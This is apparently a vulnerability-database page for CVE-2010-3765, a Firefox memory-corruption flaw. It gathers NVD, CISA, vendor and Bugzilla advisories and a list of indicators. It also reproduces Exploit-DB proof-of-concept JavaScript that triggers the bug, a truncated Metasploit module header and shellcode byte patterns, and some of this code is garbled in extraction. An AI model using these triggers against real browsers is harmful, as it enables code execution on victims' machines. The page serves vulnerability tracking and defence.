CVE-2010-3765
published 2010-10-28
Priority: P188 · critical · CVSS 3.1: 9.8
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
KEV · ITW · EXPLOIT
CISA Known Exploited Vulnerability · due 2025-10-27
Exploited in the wild
EPSS: 83.28% (99.6th percentile)
Mozilla Firefox 3.5.x through 3.5.14 and 3.6.x through 3.6.11, Thunderbird 3.1.6 before 3.1.6 and 3.0.x before 3.0.10, and SeaMonkey 2.x before 2.0.10, when JavaScript is enabled, allows remote attackers to execute arbitrary code via vectors related to nsCSSFrameConstructor::ContentAppended, the appendChild method, incorrect index tracking, and the creation of multiple frames, which triggers memory corruption, as exploited in the wild in October 2010 by the Belmoo malware.
Affected
49 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mozilla | firefox | — | — |
Detection & IOCs (extracted from sources)
- bytes: ub333udeaduffffuffff
- bytes: uffffuffffuffffuffff (shellcode terminator pattern)
- Target fingerprinting via navigator.userAgent: exploit checks for Firefox 3.6.8–3.6.11 on non-Vista/Win7 platforms before delivering payload
- Exploit triggers via interleaved document.write and appendChild calls using specific HTML tags: 'audio', 'a', 'base' — monitor for this pattern in JavaScript executing in browser context
- Metasploit module uses vuln_test checking for InstallVersion object to confirm vulnerable Firefox target before exploitation
- In-the-wild exploit (Belmoo malware) drops and executes payload as vchost.exe in %TEMP% directory — monitor for this process creation
- Metasploit module sets EXITFUNC=process and uses migrate -f as InitialAutoRunScript — look for suspicious process migration post-exploitation
- Exploit payload space is 1024 bytes with no bad characters; ROP chain signatures (e.g. u9090u0FEB NOP sled marker, u5B58u1889 gadget) appear repeatedly in shellcode blobs
- Exploit only targets Firefox 3.6.8–3.6.11 on Windows XP / Windows Server 2003 (not Vista/Win7); the in-the-wild and Metasploit variants both explicitly exclude NT 6.0 and 6.1
- JavaScript must be enabled in the browser for the vulnerability to be exploitable
- Affected products span Firefox 3.5.x–3.5.14, 3.6.x–3.6.11, Thunderbird 3.0.x before 3.0.10 and before 3.1.6, and SeaMonkey 2.x before 2.0.10 — detection scope should cover all these products, not just Firefox
CVSS provenance
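| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 9.3 | CRITICAL | AV:N/AC:M/Au:N/C:C/I:C/A:C |
| vulncheck | — | 9.8 | CRITICAL | — |
| cisa | — | 9.8 | CRITICAL | — |
| vendor_redhat | — | 9.8 | CRITICAL | — |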
GHSA
GHSA-cmrc-q43h-xrrq: Mozilla Firefox 3
ghsa_unreviewed·2022-05-17
CVE-2010-3765 [HIGH] CWE-119 GHSA-cmrc-q43h-xrrq: Mozilla Firefox 3
Mozilla Firefox 3.5.x through 3.5.14 and 3.6.x through 3.6.11, Thunderbird 3.1.6 before 3.1.6 and 3.0.x before 3.0.10, and SeaMonkey 2.x before 2.0.10, when JavaScript is enabled, allows remote attackers to execute arbitrary code via vectors related to nsCSSFrameConstructor::ContentAppended, the appendChild method, incorrect index tracking, and the creation of multiple frames, which triggers memory corruption, as exploited in the wild in October 2010 by the Belmoo malware.
VulnCheck
Mozilla Multiple Products Remote Code Execution Vulnerability
vulncheck·2010·CVSS 9.8
CVE-2010-3765 [CRITICAL] Mozilla Multiple Products Remote Code Execution Vulnerability
Mozilla Firefox, SeaMonkey, and Thunderbird contain an unspecified vulnerability when JavaScript is enabled. This allows remote attackers to execute arbitrary code via vectors related to nsCSSFrameConstructor::ContentAppended, the appendChild method, incorrect index tracking, and the creation of multiple frames, which triggers memory corruption.
Affected: Mozilla Multiple Products
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Exploitation References: https://www.cve.org/CVERecord?id=CVE-2010-3765; https://www.mozilla.org/en-US/security/advisories/mfsa2010-73/; https://www.cisa.gov/sites/def
CISA
Mozilla Multiple Products Remote Code Execution Vulnerability
cisa·2025-10-06·CVSS 9.8
CVE-2010-3765 [CRITICAL] Mozilla Multiple Products Remote Code Execution Vulnerability
Vulnerability: Mozilla Multiple Products Remote Code Execution Vulnerability
Affected: Mozilla Multiple Products
Mozilla Firefox, SeaMonkey, and Thunderbird contain an unspecified vulnerability when JavaScript is enabled. This allows remote attackers to execute arbitrary code via vectors related to nsCSSFrameConstructor::ContentAppended, the appendChild method, incorrect index tracking, and the creation of multiple frames, which triggers memory corruption.
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Notes: https://www.mozilla.org/en-US/security/advisories/mfsa2010-73 ; https://nvd.nist.gov/vuln/detail/CVE-2010-3765
Remediation Due Date: 2025-10-27
Ubuntu
Xulrunner vulnerability
vendor_ubuntu·2010-10-29
CVE-2010-3765 Xulrunner vulnerability
Title: Xulrunner vulnerability
Summary: A Xulrunner application could be made to run programs as your login if it
opened a specially crafted file.
USN-1011-1 fixed a vulnerability in Firefox. This update provides the
corresponding update for Xulrunner.
Original advisory details:
Morten Krakvik discovered a heap-based buffer overflow in Firefox. If a
user were tricked into navigating to a malicious site, an attacker could
cause a denial of service or possibly execute arbitrary code as the user
invoking the program.
Instructions: After a standard system update you need to restart any applications that
use Xulrunner to make all the necessary changes.
Ubuntu
Thunderbird vulnerability
vendor_ubuntu·2010-10-28
CVE-2010-3765 Thunderbird vulnerability
Title: Thunderbird vulnerability
Summary: Thunderbird could be made to run programs as your login if it opened a
specially crafted email message or news item.
USN-1011-1 fixed a vulnerability in Firefox. This update provides the
corresponding update for Thunderbird.
Original advisory details:
Morten Krakvik discovered a heap-based buffer overflow in Firefox. If a
user were tricked into navigating to a malicious site, an attacker could
cause a denial of service or possibly execute arbitrary code as the user
invoking the program.
Instructions: After a standard system update you need to restart Thunderbird to make all
the necessary changes.
Ubuntu
Firefox vulnerability
vendor_ubuntu·2010-10-28
CVE-2010-3765 Firefox vulnerability
Title: Firefox vulnerability
Summary: Firefox could be made to run programs as your login if it opened a
specially crafted web page.
Morten Krakvik discovered a heap-based buffer overflow in Firefox. If a
user were tricked into navigating to a malicious site, an attacker could
cause a denial of service or possibly execute arbitrary code as the user
invoking the program.
Instructions: After a standard system update you need to restart Firefox to make all the
necessary changes.
Red Hat
Firefox race condition flaw (MFSA 2010-73)
vendor_redhat·2010-10-28·CVSS 9.8
CVE-2010-3765 [CRITICAL] Firefox race condition flaw (MFSA 2010-73)
Mozilla Firefox 3.5.x through 3.5.14 and 3.6.x through 3.6.11, Thunderbird 3.1.6 before 3.1.6 and 3.0.x before 3.0.10, and SeaMonkey 2.x before 2.0.10, when JavaScript is enabled, allows remote attackers to execute arbitrary code via vectors related to nsCSSFrameConstructor::ContentAppended, the appendChild method, incorrect index tracking, and the creation of multiple frames, which triggers memory corruption, as exploited in the wild in October 2010 by the Belmoo malware.
No detection rules found.
Exploit-DB
Mozilla Firefox - Interleaving 'document.write' / 'appendChild' (Metasploit)
exploitdb·2011-02-22
CVE-2010-3765 Mozilla Firefox - Interleaving 'document.write' / 'appendChild' (Metasploit)
---
##
# $Id: mozilla_interleaved_write.rb 11796 2011-02-22 20:49:44Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 HttpClients::FF,
:ua_minver => "3.6.8",
:ua_maxver => "3.6.11",
:os_name => OperatingSystems::WINDOWS,
:javascript => true,
:rank => NormalRanking,
:vuln_test => "if (typeof InstallVersion != 'undefined') { is_vuln = true; }",
})
def initialize(info = {})
super(update_info(info,
'Name' => 'Mozilla Firefox Interleaving document.write and appe
Exploit-DB
Mozilla Firefox 3.6.8 < 3.6.11 - Interleaving 'document.write' / 'appendChild' Remote Overflow
exploitdb·2010-10-29
CVE-2010-3765 Mozilla Firefox 3.6.8 < 3.6.11 - Interleaving 'document.write' / 'appendChild' Remote Overflow
Exploit-DB
Mozilla Firefox - Interleaving 'document.write' / 'appendChild' Denial of Service
exploitdb·2010-10-28
CVE-2010-3765 Mozilla Firefox - Interleaving 'document.write' / 'appendChild' Denial of Service
---
Source: https://bugzilla.mozilla.org/show_bug.cgi?id=607222
function getatts(str){
var cobj=document.createElement(str);
cobj.id="testcase";
document.body.appendChild(cobj);
var obj=document.getElementById("testcase");
var atts = new Array();
for(p in obj){
if(typeof(obj[p])=="string"){
atts.push(p);
}
}
document.body.removeChild(cobj);
return atts;
}
function crashme() {
var tags = new Array("audio", "a", "base");
for (inx = 0; inx " + tags[i];
document.write(html);
}
}
}
}
Crash Me!
Exploit-DB
Mozilla Firefox - Simplified Memory Corruption (PoC)
exploitdb·2010-10-28·CVSS 9.8
CVE-2010-3765 [CRITICAL] Mozilla Firefox - Simplified Memory Corruption (PoC)
---
Hi there,
For those who still do not know .. The proof of concept (that I have
extracted) for CVE-2010-3765 is the following:
function G(str){
var cobj=document.createElement(str);
document.body.appendChild(cobj);
cobj.scrollWidth;
}
function crashme() {
document.write("fooFOO");
G("a");
document.write("a");
G("base");
document.write("barBAR");
G("audio");
}
crashme();
For more details:
http://extraexploit.blogspot.com/2010/10/cve-2010-3765-proof-of-concept.html
--
http://extraexploit.blogspot.com
Metasploit
Mozilla Firefox Interleaved document.write/appendChild Memory Corruption
metasploit
This module exploits a code execution vulnerability in Mozilla Firefox caused by interleaved calls to document.write and appendChild. This module was written based on a live exploit found in the wild.
Bugzilla
CVE-2010-3765 Firefox race condition flaw (MFSA 2010-73)
bugzilla·2010-10-26·CVSS 9.8
CVE-2010-3765 [CRITICAL] CVE-2010-3765 Firefox race condition flaw (MFSA 2010-73)
A race condition exists in Firefox's handling of DOM element (tags)
properties. Malicious HTML content could use this flaw to execute arbitrary
code as the user running Firefox.
This flaw does not affect the versions of SeaMonkey or Thunderbird shipped
in Red Hat Enterprise Linux 3, 4, or 5.
Discussion:
This is now live:
http://www.mozilla.org/security/announce/2010/mfsa2010-73.html
---
This issue has been addressed in following products:
Red Hat Enterprise Linux 5
Via RHSA-2010:0809 https://rhn.redhat.com/errata/RHSA-2010-0809.html
---
This issue has been addressed in following products:
Red Hat Enterprise Linux 4
Via RHSA-2010:0808 https://rhn.redhat.com/errata/RHSA-2010-0808.html
---
This issue has been addressed in
Recorded Future
October 2025 CVE Landscape
blogs_recorded_future·CVSS 9.8
[CRITICAL] October 2025 CVE Landscape
# October 2025 CVE Landscape: 32 High-Impact Vulnerabilities Demand Immediate Attention
October 2025 saw a significant escalation in vulnerability activity, with Recorded Future's Insikt Group® identifying 32 high-impact vulnerabilities, double the 16 identified in September's CVE report. Twenty-six of these vulnerabilities scored as Very Critical.
What security teams need to know:
- Microsoft dominates: Eight of 32 vulnerabilities affect Microsoft products, including a critical WSUS deserialization flaw (CVE-2025-59287) now being actively exploited
- CL0P ransomware group exploited an Oracle E-Business Suite zero-day (CVE-2025-61882) for data theft and extortion campaigns
- Legacy vulnerabilities persist: Five of the 14 RCE-enabling vulnerabilities are over a decade old, highlighting c
2010-10-28: Published
2025-10-06: Added to CISA KEV
Exploited in the wild